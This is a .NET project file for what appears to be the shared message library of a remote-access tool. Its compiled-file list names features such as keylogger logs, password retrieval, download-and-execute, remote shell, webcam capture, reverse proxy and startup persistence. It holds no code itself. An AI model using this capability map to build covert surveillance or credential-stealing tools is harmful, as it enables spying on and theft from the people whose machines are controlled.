<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <TargetFrameworks>net452</TargetFrameworks>
    <OutputType>Library</OutputType>
    <GenerateAssemblyInfo>false</GenerateAssemblyInfo>
  </PropertyGroup>
  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
    <OutputPath>..\bin\Debug\</OutputPath>
    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
    <DocumentationFile></DocumentationFile>
  </PropertyGroup>
  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
    <DebugType>none</DebugType>
    <OutputPath>..\bin\Release\</OutputPath>
    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
  </PropertyGroup>
  <ItemGroup>
    <Reference Include="System.Management" />
    <Reference Include="System.ServiceModel" />
  </ItemGroup>
  <ItemGroup>
    <PackageReference Include="protobuf-net">
      <Version>2.4.6</Version>
    </PackageReference>
    <Compile Include="Enums\ConnectionState.cs" />
    <Compile Include="Enums\ContentType.cs" />
    <Compile Include="Enums\StartupType.cs" />
    <Compile Include="Models\Drive.cs" />
    <Compile Include="Messages\MessageProcessorBase.cs" />
    <Compile Include="Messages\IProgress.cs" />
    <Compile Include="Messages\MessageHandler.cs" />
    <Compile Include="Messages\ICommandExecutor.cs" />
    <Compile Include="Enums\MouseAction.cs" />
    <Compile Include="Enums\FileType.cs" />
    <Compile Include="Enums\ShutdownAction.cs" />
    <Compile Include="Enums\UserStatus.cs" />
    <Compile Include="Models\FileSystemEntry.cs" />
    <Compile Include="Models\Process.cs" />
    <Compile Include="Models\StartupItem.cs" />
    <Compile Include="Models\TcpConnection.cs" />
    <Compile Include="NativeMethods.cs" />
    <Compile Include="Messages\DoDownloadFileResponse.cs" />
    <Compile Include="Messages\DoShellExecuteResponse.cs" />
    <Compile Include="Messages\GetAuthenticationResponse.cs" />
    <Compile Include="Messages\GetChangeRegistryValueResponse.cs" />
    <Compile Include="Messages\GetConnectionsResponse.cs" />
    <Compile Include="Messages\GetCreateRegistryKeyResponse.cs" />
    <Compile Include="Messages\GetCreateRegistryValueResponse.cs" />
    <Compile Include="Messages\GetDeleteRegistryKeyResponse.cs" />
    <Compile Include="Messages\GetDeleteRegistryValueResponse.cs" />
    <Compile Include="Messages\GetDesktopResponse.cs" />
    <Compile Include="Messages\GetDirectoryResponse.cs" />
    <Compile Include="Messages\GetDrivesResponse.cs" />
    <Compile Include="Messages\GetKeyloggerLogsResponse.cs" />
    <Compile Include="Messages\GetMonitorsResponse.cs" />
    <Compile Include="Messages\GetPasswordsResponse.cs" />
    <Compile Include="Messages\GetProcessesResponse.cs" />
    <Compile Include="Messages\GetRegistryKeysResponse.cs" />
    <Compile Include="Messages\GetRenameRegistryKeyResponse.cs" />
    <Compile Include="Messages\GetRenameRegistryValueResponse.cs" />
    <Compile Include="Messages\GetStartupItemsResponse.cs" />
    <Compile Include="Messages\GetSystemInfoResponse.cs" />
    <Compile Include="Messages\GetWebcamResponse.cs" />
    <Compile Include="Messages\GetWebcamsResponse.cs" />
    <Compile Include="Messages\SetStatus.cs" />
    <Compile Include="Messages\SetStatusFileManager.cs" />
    <Compile Include="Messages\SetUserStatus.cs" />
    <Compile Include="Messages\IMessage.cs" />
    <Compile Include="Messages\PacketRegistry.cs" />
    <Compile Include="Messages\ReverseProxyConnect.cs" />
    <Compile Include="Messages\ReverseProxyConnectResponse.cs" />
    <Compile Include="Messages\ReverseProxyData.cs" />
    <Compile Include="Messages\ReverseProxyDisconnect.cs" />
    <Compile Include="Messages\DoAskElevate.cs" />
    <Compile Include="Messages\DoChangeRegistryValue.cs" />
    <Compile Include="Messages\DoClientDisconnect.cs" />
    <Compile Include="Messages\DoClientReconnect.cs" />
    <Compile Include="Messages\DoClientUninstall.cs" />
    <Compile Include="Messages\DoClientUpdate.cs" />
    <Compile Include="Messages\DoCloseConnection.cs" />
    <Compile Include="Messages\DoCreateRegistryKey.cs" />
    <Compile Include="Messages\DoCreateRegistryValue.cs" />
    <Compile Include="Messages\DoDeleteRegistryKey.cs" />
    <Compile Include="Messages\DoDeleteRegistryValue.cs" />
    <Compile Include="Messages\DoDownloadAndExecute.cs" />
    <Compile Include="Messages\DoDownloadFile.cs" />
    <Compile Include="Messages\DoDownloadFileCancel.cs" />
    <Compile Include="Messages\DoKeyboardEvent.cs" />
    <Compile Include="Messages\DoLoadRegistryKey.cs" />
    <Compile Include="Messages\DoMouseEvent.cs" />
    <Compile Include="Messages\DoPathDelete.cs" />
    <Compile Include="Messages\DoPathRename.cs" />
    <Compile Include="Messages\DoProcessKill.cs" />
    <Compile Include="Messages\DoProcessStart.cs" />
    <Compile Include="Messages\DoRenameRegistryKey.cs" />
    <Compile Include="Messages\DoRenameRegistryValue.cs" />
    <Compile Include="Messages\DoShellExecute.cs" />
    <Compile Include="Messages\DoShowMessageBox.cs" />
    <Compile Include="Messages\DoShutdownAction.cs" />
    <Compile Include="Messages\DoStartupItemAdd.cs" />
    <Compile Include="Messages\DoStartupItemRemove.cs" />
    <Compile Include="Messages\DoUploadAndExecute.cs" />
    <Compile Include="Messages\DoUploadFile.cs" />
    <Compile Include="Messages\DoVisitWebsite.cs" />
    <Compile Include="Messages\DoWebcamStop.cs" />
    <Compile Include="Messages\GetAuthentication.cs" />
    <Compile Include="Messages\GetConnections.cs" />
    <Compile Include="Messages\GetDesktop.cs" />
    <Compile Include="Messages\GetDirectory.cs" />
    <Compile Include="Messages\GetDrives.cs" />
    <Compile Include="Messages\GetKeyloggerLogs.cs" />
    <Compile Include="Messages\GetMonitors.cs" />
    <Compile Include="Messages\GetPasswords.cs" />
    <Compile Include="Messages\GetProcesses.cs" />
    <Compile Include="Messages\GetStartupItems.cs" />
    <Compile Include="Messages\GetSystemInfo.cs" />
    <Compile Include="Messages\GetWebcam.cs" />
    <Compile Include="Messages\GetWebcams.cs" />
    <Compile Include="Messages\SetAuthenticationSuccess.cs" />
    <Compile Include="Networking\ISender.cs" />
    <Compile Include="Properties\AssemblyInfo.cs" />
    <Compile Include="Models\RegSeekerMatch.cs" />
    <Compile Include="Models\RegValueData.cs" />
    <Compile Include="IO\FileSplit.cs" />
    <Compile Include="Utilities\ByteConverter.cs" />
    <Compile Include="Utilities\SafeRandom.cs" />
    <Compile Include="Video\Codecs\UnsafeStreamCodec.cs" />
    <Compile Include="Video\Compression\JpgCompression.cs" />
    <Compile Include="Video\Resolution.cs" />
  </ItemGroup>
  <ItemGroup Condition="'$(TargetFramework)' == 'netstandard2.0'">
    <PackageReference Include="Microsoft.Win32.Registry">
      <Version>4.7.0</Version>
    </PackageReference>
    <PackageReference Include="System.Drawing.Common">
      <Version>4.7.0</Version>
    </PackageReference>
	<PackageReference Include="System.Management">
      <Version>4.7.0</Version>
    </PackageReference>
  </ItemGroup>
</Project>